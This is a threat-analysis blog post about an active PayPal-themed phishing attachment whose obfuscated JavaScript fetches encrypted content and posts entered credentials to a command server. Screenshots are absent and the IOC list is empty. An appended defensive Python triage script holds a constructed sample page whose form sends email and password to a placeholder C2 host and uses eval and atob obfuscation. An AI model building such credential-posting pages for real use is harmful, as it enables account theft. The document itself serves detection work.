Phishing: PayPal theme 10 May 2017 | CredSteal

Originally published in PhishCentral

This one is currently active. It tries to lure victims into downloading and opening an HTML file that opens locally in the browser but, when the 'submit' button is hit, POSTs the entered information back to the C2, provided the information matches the conditions in the script.
This is what the email body looks like.

The HTML Attachment

Clever, obfuscated JS running in the background makes the connection.
The actual HTML content only loads if an internet connection is available: the JS fetches the page contents from the remote server and then renders them in the browser.

Locally saved HTML, loaded into a browser with internet available

The actual content is served from this server:

PCAP of the request in the background

The content served

The whole HTML is encrypted and is only decrypted on the fly in the browser. Once decrypted, we can see the JS code that executes in the browser.

Decrypted Code

The JS code is clever and checks for a few conditions. If the conditions are met, it POSTs the info to the C2; if they are not met, it redirects to the legitimate PayPal site.

One of the conditions. 

Final condition that directs the traffic
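A defender-side triage check for attachments like this one, added here as an example and not taken from the original post or from the kit analysed above. It statically flags the traits described in this analysis (runtime decode/eval primitives, a fetch to an external host, a form that posts credentials to a non-PayPal host, and a long encoded blob) on a constructed sample document. The C2 host, paths and blob are made-up placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed samples (not the real kit): a loader-style attachment that fetches
# remote content, decodes it and posts the form elsewhere, plus a benign control.
SUSPICIOUS_HTML = """<html><body>
<form method="POST" action="http://c2.example.invalid/gate.php">
<input name="email"><input name="pass" type="password"><input type="submit">
</form>
<script>
var x = new XMLHttpRequest(); x.open("GET", "http://c2.example.invalid/content", true);
var k = atob("aGVsbG8gd29ybGQgdGhpcyBpcyBhIGNvbnN0cnVjdGVkIHBheWxvYWQ=");
eval(unescape("%64%6f%63%75%6d%65%6e%74"));
</script></body></html>"""

BENIGN_HTML = """<html><body>
<form method="POST" action="https://www.paypal.com/signin">
<input name="email"><input name="pass" type="password"><input type="submit">
</form></body></html>"""

# The brand the lure claims to be; any other host receiving credentials is a finding.
LEGIT_DOMAINS = ("paypal.com",)

def is_legit(host):
    return bool(host) and any(host == d or host.endswith("." + d) for d in LEGIT_DOMAINS)

def triage_html(html):
    """Static triage of an HTML attachment; returns findings and a verdict."""
    f = {}
    # 1. Runtime decode/eval primitives typical of obfuscated loaders
    dyn = re.findall(r"\b(eval|unescape|atob|Function|String\.fromCharCode)\s*\(", html)
    f["dynamic_eval"] = sorted(set(dyn))
    # 2. Hosts the document reaches out to (script fetches, form targets, resources)
    hosts = {urlparse(u).hostname for u in re.findall(r"https?://[^\s\"'<>]+", html)}
    f["external_hosts"] = sorted(h for h in hosts if h and not is_legit(h))
    # 3. Forms that would send the typed credentials to a non-brand host
    actions = re.findall(r"<form[^>]*\baction=[\"']([^\"']+)[\"']", html, re.I)
    f["foreign_form_posts"] = [a for a in actions
                               if urlparse(a).hostname and not is_legit(urlparse(a).hostname)]
    # 4. Long base64/hex/percent-encoded runs, i.e. an encrypted or encoded payload
    f["encoded_blobs"] = len(re.findall(r"[A-Za-z0-9+/=%]{40,}", html))
    score = (2 * bool(f["dynamic_eval"]) + 2 * bool(f["foreign_form_posts"])
             + bool(f["external_hosts"]) + bool(f["encoded_blobs"]))
    f["score"] = score
    f["verdict"] = "suspicious" if score >= 3 else "benign"
    return f

if __name__ == "__main__":
    for name, doc in (("suspicious", SUSPICIOUS_HTML), ("benign", BENIGN_HTML)):
        print(name, triage_html(doc))
```

The scoring weights are a starting point for mail-gateway triage, not a classifier; the same checks can be run over the decrypted second-stage content once it has been captured, as the PCAP above shows.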

IOCs for this:

